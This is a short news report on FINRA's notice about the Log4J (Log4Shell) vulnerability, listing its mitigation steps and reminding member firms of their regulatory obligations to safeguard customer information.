FINRA deploys mitigation tactics against Log4J vulnerability
The United States Financial Industry Regulatory Authority (FINRA) has issued a notice regarding the Log4J vulnerability.
The Authority says it has taken immediate steps to neutralize the risk. The mitigation tactics deployed by FINRA include defining alerts for exploit attempts, implementing web application firewall (WAF) rules designed to prevent exploitation of the vulnerability, conducting scans to confirm WAF rules are working as expected, and beginning to update Log4J libraries used in its self-developed applications.
FINRA says it is tracking this vulnerability, and that it will apply software updates as those become available, and monitor attacker exploit attempts.
Earlier this week, FINRA issued an alert to member firms about a recently identified vulnerability in Apache Log4J software, which is an open-source, Java-based logging utility widely used by enterprise applications and cloud services. The “Log4Shell” vulnerability presents risk for member firms because they may be using this software in internal applications, or the software may be embedded in third-party software packages.
In addition, many applications written in Java are potentially vulnerable.
Bad actors may take advantage of this vulnerability to compromise systems to potentially steal information or engage in fraudulent activities. For example, a remote attacker can exploit this vulnerability to take control of an affected system.
FINRA reminds firms that the U. S. Securities and Exchange Commission’s (SEC) Regulation S-P Rule 30 requires firms to have written policies and procedures that are reasonably designed to safeguard customer records and information and FINRA Rule 4370 (Business Continuity Plans and Emergency Contact Information) also applies to denials of service and other interruptions to members’ operations.